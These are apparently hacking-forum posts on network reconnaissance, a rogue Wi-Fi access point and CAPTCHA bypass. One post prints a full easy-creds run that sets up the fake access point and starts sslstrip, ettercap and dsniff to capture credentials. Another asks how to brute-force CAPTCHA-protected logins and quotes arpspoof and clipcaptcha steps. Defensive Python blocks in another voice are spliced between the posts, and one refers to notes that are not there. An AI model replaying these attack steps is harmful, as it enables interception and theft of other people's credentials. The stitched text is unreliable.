   //- nmap -p80 --script http-email-harvest --script-args httpspider.maxpagecount=50 exploit-db.com -//
   //- nmap -p80 --script http-email-harvest --script-args httpspider.url=/welcome.php <target> -//

   //- nmap -p80 --script http-google-email --script-args domain=insecure.org scanme.nmap.org -//
   //- nmap -p80 --script http-google-email --script-args pages=10 scanme.nmap.org -//
   

1.5 Discovering hostnames pointing to the same IP address



+++++++++++++++++++++++++++++++++++++++++++++++
nmap -Pn -p 135 -S 127.0.0.1 192.168.1.136    # [LAN] ip spoof, but real MAC address.


+++++++++++++++++++++++ [ Host Discovery --- examples ] ++++++++++++++++++++++++
//- nmap -sn -PE -T3 192.168.1.100-120 -//  -----> 2 hosts up
//- nmap -sn -PE -T2 192.168.1.100-120 -//  -----> 3 hosts up

root@AA:~/Desktop# nmap -sn -PE -T3 192.168.1.100-120

Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:29 CST
Nmap scan report for 192.168.1.102
Host is up (0.00086s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0020s latency).
Nmap done: 21 IP addresses (2 hosts up) scanned in 1.77 seconds   ------ 2 hosts up

root@AA:~/Desktop# nmap -sn -PE -T2 192.168.1.100-120

Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:30 CST
Nmap scan report for 192.168.1.101
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0018s latency).
Nmap done: 21 IP addresses (3 hosts up) scanned in 19.78 seconds  ------ 3 hosts up


----------------------------============================================
root@AA:~# fping -a -c 2 -g 119.75.218.1/24             ------------------------  5 hosts
119.75.218.11  : xmt/rcv/%loss = 2/1/50%, min/avg/max = 9.99/9.99/9.99
119.75.218.45  : xmt/rcv/%loss = 2/2/0%, min/avg/max = 13.0/16.6/20.2
119.75.218.70  : xmt/rcv/%loss = 2/2/0%, min/avg/max = 3.58/5.04/6.51
119.75.218.77  : xmt/rcv/%loss = 2/2/0%, min/avg/max = 7.49/7.87/8.26
119.75.218.143 : xmt/rcv/%loss = 2/2/0%, min/avg/max = 11.8/12.3/12.8
root@AA:~# fping -a -c 4 -g 119.75.218.1/24             ------------------------  6 hosts
119.75.218.11  : xmt/rcv/%loss = 4/4/0%, min/avg/max = 3.41/12.2/21.9
119.75.218.45  : xmt/rcv/%loss = 4/4/0%, min/avg/max = 2.96/10.2/30.6
119.75.218.70  : xmt/rcv/%loss = 4/4/0%, min/avg/max = 3.41/9.08/18.0
119.75.218.77  : xmt/rcv/%loss = 4/4/0%, min/avg/max = 3.54/5.31/9.04
119.75.218.143 : xmt/rcv/%loss = 4/4/0%, min/avg/max = 8.42/11.7/15.2
119.75.218.254 : xmt/rcv/%loss = 4/1/75%, min/avg/max = 19.8/19.8/19.8

root@AA:~# nmap -sn -PE -T2 192.168.1.100-120          ------------------------- 3 hosts

Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:30 CST
Nmap scan report for 192.168.1.101
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0018s latency).
Nmap done: 21 IP addresses (3 hosts up) scanned in 19.78 seconds


----------------------------============================================
root@AA:~# nmap -n -sn --data-length 56 --ttl 64 -PE 119.75.217.1/24  -------- 0 hosts up

Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-28 15:35 CST
Nmap done: 256 IP addresses (0 hosts up) scanned in 52.15 seconds

root@AA:~# nmap -n -sn --data-length 56 --ttl 64 -PE 119.75.217.26    -------- 1 host up

Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-28 15:38 CST
Nmap scan report for 119.75.217.26
Host is up (0.0045s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
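The [--badsum] notes above say that only a poorly configured host answers a packet whose checksum is wrong, which is also why such probes are easy to flag. As an added example (my code, not part of the original post and not Nmap's), the following Python computes and verifies the IPv4 header checksum the way a receiving stack or a sensor does, so a defender can pick out bad-checksum probes from a capture. All addresses and header fields are constructed sample values; the expected checksum values were worked out by hand from those fields.

```python
import socket
import struct
from typing import List, Optional


def internet_checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: the one's-complement of the one's-complement
    sum of all 16-bit big-endian words (an odd trailing byte is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, total_length: int = 40, ttl: int = 64,
                      proto: int = 6, ident: int = 0,
                      checksum: Optional[int] = None) -> bytes:
    """Build a 20-byte IPv4 header (no options). With checksum=None the correct
    value is filled in; an explicit wrong value gives the kind of header a
    --badsum probe carries on the wire. Sample fields are constructed."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      0x45,                 # version 4, IHL 5 (20 bytes)
                      0,                    # TOS / DSCP
                      total_length,
                      ident,
                      0x4000,               # flags: DF set, fragment offset 0
                      ttl, proto,
                      0,                    # checksum placeholder
                      socket.inet_aton(src), socket.inet_aton(dst))
    csum = internet_checksum(hdr) if checksum is None else checksum
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def compute_ipv4_checksum(header: bytes) -> int:
    """The checksum a receiver expects: computed with the checksum field zeroed."""
    ihl = (header[0] & 0x0F) * 4
    zeroed = header[:10] + b"\x00\x00" + header[12:ihl]
    return internet_checksum(zeroed)


def ipv4_checksum_ok(header: bytes) -> bool:
    """Verification as a stack does it: summing the header *including* the stored
    checksum must give 0xFFFF, so the complemented sum comes out as zero."""
    ihl = (header[0] & 0x0F) * 4
    return internet_checksum(header[:ihl]) == 0


def find_bad_checksums(headers: List[bytes]) -> List[int]:
    """Indexes of headers a conforming host silently drops. A burst of these from
    one source, or a host that answers them, is what a sensor should report."""
    return [i for i, h in enumerate(headers) if not ipv4_checksum_ok(h)]


if __name__ == "__main__":
    good = build_ipv4_header("192.168.1.100", "192.168.1.1")
    bad = build_ipv4_header("192.168.1.100", "192.168.1.1", checksum=0xBEEF)
    print(hex(compute_ipv4_checksum(good)), ipv4_checksum_ok(good), ipv4_checksum_ok(bad))
    print(find_bad_checksums([good, bad, good]))
```

Because the stored checksum is part of the sum during verification, a header whose TTL was changed without recomputing the checksum fails the same check; a router that decrements TTL always recomputes it, so on a real link that case also indicates a crafted or corrupted packet.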
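The host discovery runs above show the practical problem with comparing scans by eye: the -T2 run found a host the -T3 run missed, and the "Nmap done" summary is the only place the count appears. As an added example (my code, not from the original post and not part of Nmap), here is a small Python parser for the normal -sn output that cross-checks the parsed hosts against that summary line and diffs two runs. The two sample runs are the ones quoted in the notes above, embedded verbatim; the mismatched sample in the usage note is constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Sample input: the two -sn runs quoted in the notes above, verbatim.
RUN_T3 = """\
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:29 CST
Nmap scan report for 192.168.1.102
Host is up (0.00086s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0020s latency).
Nmap done: 21 IP addresses (2 hosts up) scanned in 1.77 seconds
"""

RUN_T2 = """\
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:30 CST
Nmap scan report for 192.168.1.101
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0018s latency).
Nmap done: 21 IP addresses (3 hosts up) scanned in 19.78 seconds
"""

# "Nmap scan report for host (ip)" when a name resolved, "for ip" otherwise.
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?")
UP_RE = re.compile(r"^Host is up(?: \(([\d.]+)s latency\))?")
DONE_RE = re.compile(r"^Nmap done: (\d+) IP address(?:es)? \((\d+) hosts? up\) "
                     r"scanned in ([\d.]+) seconds")


def parse_sn_output(text: str) -> Tuple[Dict[str, Optional[float]], dict]:
    """Return ({ip: latency_seconds_or_None}, summary) for one -sn run and refuse
    output whose summary count disagrees with the hosts actually listed, which
    catches truncated or concatenated logs before they get compared."""
    hosts: Dict[str, Optional[float]] = {}
    current: Optional[str] = None
    summary: dict = {}
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)     # prefer the IP when a name resolved
            continue
        m = UP_RE.match(line)
        if m and current is not None:
            hosts[current] = float(m.group(1)) if m.group(1) else None
            current = None
            continue
        m = DONE_RE.match(line)
        if m:
            summary = {"scanned": int(m.group(1)), "up": int(m.group(2)),
                       "seconds": float(m.group(3))}
    if summary and summary["up"] != len(hosts):
        raise ValueError(f"summary says {summary['up']} hosts up but {len(hosts)} were listed")
    return hosts, summary


def diff_runs(a: Dict[str, Optional[float]],
              b: Dict[str, Optional[float]]) -> Tuple[List[str], List[str], List[str]]:
    """(only_in_a, only_in_b, in_both), each sorted."""
    sa, sb = set(a), set(b)
    return sorted(sa - sb), sorted(sb - sa), sorted(sa & sb)


if __name__ == "__main__":
    t3, s3 = parse_sn_output(RUN_T3)
    t2, s2 = parse_sn_output(RUN_T2)
    only_t3, only_t2, both = diff_runs(t3, t2)
    print(f"-T3: {s3['up']} up in {s3['seconds']}s; -T2: {s2['up']} up in {s2['seconds']}s")
    print("only -T2 found:", only_t2, "| both:", both)
```

Run against the two quoted scans it reports 192.168.1.101 as found only by the slower -T2 run, which is the point of the notes: a polite timing template trades time for completeness, and the 19.78 s versus 1.77 s difference is the cost. Feeding it a log that ends after "Nmap scan report" lines but whose summary claims more hosts raises ValueError instead of silently producing a short host list.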

8
Hacking and Security / Re: failed to connect FAKEAP
« on: January 10, 2014, 02:10:47 am »
@RedBullAddicted

I'm sure that the tunnel interface is at0. E.g.:
  • ifconfig | grep Link| grep -v lo
at0    Link encap:Ethernet  HWaddr 7c:dd:90:42:94:55        --------->> * Attention Here *         
          inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0      Link encap:Ethernet  HWaddr 08:00:27:c9:07:55 
          inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

Maybe easy_creds is from yours.


@noob
What you've done is a good job for someone here. 


Thanks to everyone !

9
Hacking and Security / Re: failed to connect FAKEAP
« on: January 09, 2014, 02:49:30 am »

When the USB WiFi driver is installed on Windows 7, everything seems OK today.


But I know that backtrack5(vbox) can read my USB card, something like that:

  • airmon-ng

Interface    Chipset        Driver
wlan0        Ralink RT2870/3070    rt2800usb - [phy0]

So funny!




10
Hacking and Security / failed to connect FAKEAP
« on: January 05, 2014, 04:18:01 pm »
Today I set up a fakeap at home, but it confuses me.
When a mobile connects to the fakeap, it says "Network connection error. Try again ?" or "authentication error ".
What's the reason ?

[Lab]
Windows 7 + VirtualBox(Backtrack r3 x 86)

What I have done, e.g.:
======================================================================================
easy-creds v3.6 11/08/2011
This script leverages tools for stealing credentials during a pen test.
*** At any time, ctrl+c to return to main menu ***

[+] Provide path for saving log files, ex. root, *NOT* /root/: /root/Desktop/

[+] Would you like to include a sidejacking attack? (y/n): n

[+] Network Interfaces:
eth0       xx:xx:xx:xx:xx:xx             IP:10.0.2.15



[+] Interface connected to the internet, example eth0: eth0

[*] airmon-ng
Interface    Chipset        Driver
wlan0        Ralink RT2870/3070    rt2800usb - [phy0]

[+] Wireless interface name, example wlan0: wlan0

[+] rogue AP ESSID, example FreeWiFi: Freeeeeeeee
[+] Channel, example 6 or 11: 6

[+] Monitor interface(s)
[*] airmon-ng | grep mon
 mon0        Ralink RT2870/3070    rt2800usb - [phy0]

[+] Enter monitor enabled interface name, example mon0: mon0
[*] ifconfig | grep Link| grep -v lo
eth0      Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx 
          inet6 addr: xxxx::xxx:xxxx:xxxx:xxx/xx Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

[+] Enter tunnel interface, example at0: at0

[+] Do you have a populated dhcpd.conf file to use? (y/n) n
[+]Create dhcpd conf file: /etc/dhcp3/dhcpd-ec.conf
[+]Network range for your tunneled interface, example 10.0.0.0/24: 192.168.1.0/24
[+] Enter the IP address for the DNS server, example 8.8.8.8: 8.8.8.8


Creating a dhcpd.conf to assign addresses to clients that connect to us.
------/etc/dhcp3/dhcpd-ec.conf-----------
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.1;
    option broadcast-address 192.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}

[+] Launching Airbase with your settings.
[*] airbase-ng -P -e Freeeeeeeee -c 6 mon0 &

[+] Configuring dhcp tunneled interface.
[?] TUNIFACE: at0
[?] ATIP: 192.168.1.1
[?] ATSUB: 255.255.255.0
[?] ATNET: 192.168.1.0
[*] ifconfig at0 up
[*] ifconfig at0 192.168.1.1 netmask 255.255.255.0
[*] ifconfig at0 mtu 1400
[*] route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 dev at0

[+] Setting up iptables to handle traffic seen by the tunneled interface.
[*] iptables --flush
[*] iptables --table nat --flush
[*] iptables --delete-chain
[*] iptables --table nat --delete-chain
[*] iptables -P FORWARD ACCEPT
[*] iptables --append FORWARD --in-interface at0 -j ACCEPT
[*] iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
[*] iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

[+] Launching Tail.
[*] tail -f /var/log/messages &

[+] DHCP server starting on tunneled interface.
[*] dhcpd3 -q -cf /etc/dhcp3/dhcpd-ec.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

[*] ifconfig | grep Link| grep -v lo
at0       Link encap:Ethernet  HWaddr 7c:dd:90:42:94:55 
          inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0      Link encap:Ethernet  HWaddr 08:00:27:c9:07:55 
          inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

[+] Creating folder for attack output ...
[*] mkdir -p //root/Desktop//easy-creds-2014-01-05-0924

[+] Launching SSLStrip.
[*] python /pentest/web/sslstrip/sslstrip.py -pfk -w //root/Desktop//easy-creds-2014-01-05-0924/sslstrip2014-01-05-0925.log &

[+] Launching ettercap, poisoning specified hosts.
[*] ettercap -a /etc/etter.conf -T -q -l //root/Desktop//easy-creds-2014-01-05-0924/ettercap2014-01-05-0925 -i at0 // // &

[+] Configuring IP forwarding.
[*] echo 1 > /proc/sys/net/ipv4/ip_forward

[+] Launching URLSnarf.
[*] urlsnarf  -i at0&
Launching Dsniff.
[*] dsniff -m -i at0 -w //root/Desktop//easy-creds-2014-01-05-0924/dsniff2014-01-05-0925.log &

[^] Time to make it rain...  Enjoy!



11
Hacking and Security / Re: How to crack the web form with Captcha ?
« on: September 25, 2013, 05:12:16 pm »

http://www.mcafee.com/us/resources/white-papers/foundstone/wp-bypassing-captchas.pdf
It's really a nice job.


Quote
CAPTCHA providers generally offer both CAPTCHA generation and validation services. To use these services, the subscribing websites either use the existing libraries and plugins or write their own. A typical user interaction with a web application that relies on a CAPTCHA provider is summarized below:

1. A user requests a page that requires CAPTCHA validation.

2. The returned page contains an embedded <img> (or <script>) tag to retrieve the CAPTCHA image from the CAPTCHA provider.

3. Upon parsing the embedded tags, the browser retrieves a CAPTCHA from the CAPTCHA provider and displays it to the user.

4. The user fills in the form fields, enters the CAPTCHA solution, and submits the page to the web application.

5. The web application then submits the CAPTCHA solution to the CAPTCHA provider for verification.

6. The CAPTCHA provider responds to the web application with success or failure message.

7. Based on CAPTCHA provider’s response, the web application allows or denies the request.




Quote
Sample impersonation
The steps below show how to run clipcaptcha as CAPCHA provider:
• Enable forwarding mode on your machine. (echo “1” > /proc/sys/net/ipv4/ip_forward)
• Set up iptables to redirect HTTP traffic to clipcaptcha. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listeningPort>)
• Run arpspoof to redirect the traffic to your machine. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
• Run clipcaptcha in one of its mode of operation. (clipcaptcha.py <mode> -l <listeningPort>)
Once clipcaptcha instance starts running, all CAPTCHA validation requests will be administered by clipcaptcha.

Has anyone ever tested it?
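What the quoted paper describes in steps 5 to 7 is that the web application trusts whatever answer comes back from the "provider", so anyone who can sit in that path and answer "success" defeats the CAPTCHA. As an added example (my own simplified model, not the paper's tool and not any real provider's protocol), the Python below puts a trusting check next to one that only accepts a validation reply authenticated with a key shared between site and provider and bound to the challenge being verified. The keyed MAC stands in for whatever authenticates the channel in practice, typically TLS to the provider with certificate verification; the provider, the impersonator, the key and the challenge format are all constructed for the illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple


def _mac(site_key: bytes, challenge_id: str, result: str) -> str:
    """Authenticate (challenge, result) with the site's shared key (constructed scheme)."""
    return hmac.new(site_key, f"{challenge_id}:{result}".encode(), hashlib.sha256).hexdigest()


class CaptchaProvider:
    """Generates challenges (step 2/3) and validates solutions (step 5/6). Each
    reply carries a MAC under the subscribing site's key, so a reply produced by
    anyone without that key fails verification at the web application."""

    def __init__(self, site_key: bytes):
        self._site_key = site_key
        self._open: Dict[str, str] = {}          # challenge id -> expected solution

    def new_challenge(self) -> Tuple[str, str]:
        challenge_id = secrets.token_hex(8)
        solution = secrets.token_hex(3)          # stands in for the text in the image
        self._open[challenge_id] = solution
        return challenge_id, solution

    def validate(self, challenge_id: str, answer: str) -> Dict[str, str]:
        expected = self._open.pop(challenge_id, None)   # one-time: no replay of a solved challenge
        ok = expected is not None and hmac.compare_digest(expected.encode(), answer.encode())
        result = "success" if ok else "failure"
        return {"challenge": challenge_id, "result": result,
                "mac": _mac(self._site_key, challenge_id, result)}


class ImpersonatingProvider:
    """Models the on-path impersonator from the quoted paper: it answers every
    validation request with success, but it holds no site key and cannot sign."""

    def validate(self, challenge_id: str, answer: str) -> Dict[str, str]:
        return {"challenge": challenge_id, "result": "success"}


def naive_accepts(reply: Dict[str, str]) -> bool:
    """Step 7 as a trusting web application does it: believe whatever came back."""
    return reply.get("result") == "success"


def hardened_accepts(reply: Dict[str, str], challenge_id: str, site_key: bytes) -> bool:
    """Step 7 with the reply authenticated and bound to the challenge being checked."""
    expected = _mac(site_key, challenge_id, "success")
    return hmac.compare_digest(expected, reply.get("mac", ""))


if __name__ == "__main__":
    key = b"constructed-site-key"
    provider = CaptchaProvider(key)
    cid, solution = provider.new_challenge()
    print("genuine, correct:", hardened_accepts(provider.validate(cid, solution), cid, key))
    cid, _ = provider.new_challenge()
    forged = ImpersonatingProvider().validate(cid, "anything")
    print("impersonator, naive:", naive_accepts(forged),
          "hardened:", hardened_accepts(forged, cid, key))
```

The naive check is exactly what clipcaptcha exploits; the hardened one rejects the forged reply, a replayed reply for an already-solved challenge, and a genuine "failure" reply, because the MAC is computed over the challenge id and the result together.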

12
Hacking and Security / How to crack the web form with Captcha ?
« on: September 25, 2013, 10:40:05 am »
With Hydra and Burp Suite, we can crack a web form without a captcha quickly.

But now there are many login pages with captchas.

I've tested some tools, Ex:

Tesseract OCR engine
FastOCR
cintruder


They do badly sometimes. Ex:
Slow speed
Captcha is not supported.



How can we crack them quickly?

